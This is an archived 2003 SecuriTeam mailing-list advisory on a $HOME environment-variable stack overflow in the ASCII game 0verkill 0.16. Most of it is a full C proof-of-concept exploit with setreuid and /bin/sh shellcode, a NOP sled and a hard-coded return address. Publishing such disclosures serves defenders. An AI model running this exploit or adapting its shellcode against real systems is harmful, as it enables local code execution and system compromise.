[UNIX] 0verkill Environment Variable Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 11/09/03
- Previous message: SecuriTeam: "[TOOL] IMAP Password Brute Forcer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 9 Nov 2003 15:29:15 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
0verkill Environment Variable Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://artax.karlin.mff.cuni.cz/~brain/0verkill/> 0verkill is a
client-server 2D deathmatch-like game in ASCII art. It supports free
connecting/disconnecting during the game, and runs well on modem lines.
Graphics are in 16-color ASCII art with elaborate hero animations.
0verkill contains an $HOME environment variable stack overflow, this can
be exploited very simple to execute arbitrary code (Most distributions do
not set special privileges to this program, so no special privileges can
be gained).
DETAILS
Vulnerable systems:
* 0verkill version 0.16
Exploit:
/* gEEk-0verkill.c
*
* PoC exploit made for advisory based upon an local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* 0verkill v0.16
*
* Tested on: Debian 3.0
*
* Advisory source: geekz.nl (security team)
* http://www.geekz.nl/releases/advisories/gEEk-adv.0x05
*
* -----------------------------------------
* coded by: demz (geekz.nl) (demz@geekz.nl)
* -----------------------------------------
*
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x31\xc9" // xor ecx, ecx
"\xb0\x46" // mov al, 70
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\x50" // push eax
"\x68\x6e\x2f\x73\x68" // push long 0x68732f6e
"\x68\x2f\x2f\x62\x69" // push long 0x69622f2f
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x99" // cdq
"\xb0\x0b" // mov al, 11
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\xb0\x01" // mov al, 1
"\xcd\x80"; // int 0x80
int main()
{
unsigned long ret = 0xbffffec4;
char buffer[268];
int i=0;
memset(buffer, 0x90, sizeof(buffer));
for (0; i < strlen(shellcode) - 1;i++)
buffer[100 + i] = shellcode[i];
buffer[268] = (ret & 0x000000ff);
buffer[269] = (ret & 0x0000ff00) >> 8;
buffer[270] = (ret & 0x00ff0000) >> 16;
buffer[271] = (ret & 0xff000000) >> 24;
buffer[272] = 0x0;
printf("\n0verkill v0.16 local exploit\n");
printf("---------------------------------------- demz @ geekz.nl
--\n");
setenv("HOME", buffer, 1);
execl("0verkill", "0verkill", NULL);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:demz@geekz.nl> demz.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] IMAP Password Brute Forcer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] w3wp DoS
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... 1/12/2006 - Vendor requested
for additional info ... recv(conn_socket, szBuffer, 256, 0); ... (Securiteam) - [NEWS] RealNetworks Helix Server 9 Administration Server Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... Several of Real Networks
Helix Server products utilize a common ... (Securiteam) - [NT] Microsoft JET Multiple Vulnerabilities (Exploit)
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft JET database
is "a lightweight database widely used by MS Office ... MSAccess offset for stable jmp edx
... (Securiteam) - [UNIX] Metamail Format String and Buffer Overflows Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... Metamail implements
... The first format string bug occurs when a message has a ... (Securiteam) - [NEWS] Opera HREF Escaped Server Name Overflow
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... The Opera browser
exhibits a failure when rendering HTML. ... (Securiteam)
